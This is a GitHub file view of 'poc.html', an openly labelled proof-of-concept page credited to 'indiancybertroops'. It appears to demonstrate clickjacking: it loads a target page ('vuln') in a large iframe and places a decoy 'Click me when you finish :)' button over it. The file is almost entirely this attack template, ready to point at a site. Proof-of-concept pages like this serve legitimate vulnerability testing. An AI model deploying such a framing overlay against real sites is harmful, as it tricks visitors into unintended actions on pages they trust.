-
Notifications
You must be signed in to change notification settings - Fork 2
Expand file tree
/
Copy pathpoc.html
More file actions
33 lines (30 loc) · 725 Bytes
/
Copy pathpoc.html
File metadata and controls
33 lines (30 loc) · 725 Bytes
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
<html>
<head>
<title> HyMe-Sh </title>
<meta name ="author" content="indiancybertroops">
<link rel="stylesheet" href="https://fonts.googleapis.com/
css?family-Righteous">
</head>
<style type="text/css">
body{
background:white;
background-color:white;
height: 90%;
}
h1{ font-family: Righteous;
color: Red;
}
* {
margin: 0;
padding: 0;
}
.blink{animation:blink 1s infinite}@keyframes blink{to{opacity:.0;}}
</style>
<br>
<center> <h1> POC by Indiancybertroops,org </h1> </center>
<br> </br>
<center>
<iframe src="vuln" width="1000" height="550"></iframe>
<div style="height: 30px;width: 130px;left: 53%;bottom: 39%;background: #789;" class="xss"><button>Click me when you finish :)</button></div>
</center>
</html>